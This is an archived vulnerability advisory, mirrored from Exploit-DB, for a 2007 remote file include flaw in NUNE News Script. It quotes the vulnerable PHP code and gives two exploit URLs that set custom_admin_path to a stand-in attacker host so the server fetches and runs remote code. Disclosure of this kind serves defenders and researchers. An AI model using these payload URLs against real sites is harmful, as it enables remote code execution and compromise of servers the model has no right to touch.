NUNE News Script (custom_admin_path) Remote File Include Vulnerability

vendor:

NUNE News Script

by:

xoron

7.5

CVSS

HIGH

Remote File Include

CWE

Product Name: NUNE News Script

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

NUNE News Script (custom_admin_path) Remote File Include Vulnerability

The vulnerability allows remote attackers to include arbitrary files via a URL in the custom_admin_path parameter.

Mitigation:

The vulnerability can be mitigated by validating and sanitizing user input before including files.

Source

Exploit-DB raw data:

-----------------------------------------------

NUNE News Script (custom_admin_path) Remote File Include Vulnerablity

-----------------------------------------------

Author: xoron

-----------------------------------------------

Code:

if (isset($custom_admin_path))
    $special_admin_path = $custom_admin_path;

else
    $special_admin_path = "news/admin";

require("$special_admin_path/config/nune.conf.php");

-----------------------------------------------

3xplo!t:

www.target.com/[script]/index.php?custom_admin_path=http://evilscript?
www.target.com/[script]/archives.php?custom_admin_path=http://evilscript?

-----------------------------------------------

download: http://download.sourceforge.net/nune/nune-2.0pre2.tar.gz

-----------------------------------------------

Greetz: str0ke, kacper, GODAttach

nukedx'e elveda, kendine iyi bak dostum..!

-----------------------------------------------

# milw0rm.com [2007-01-06]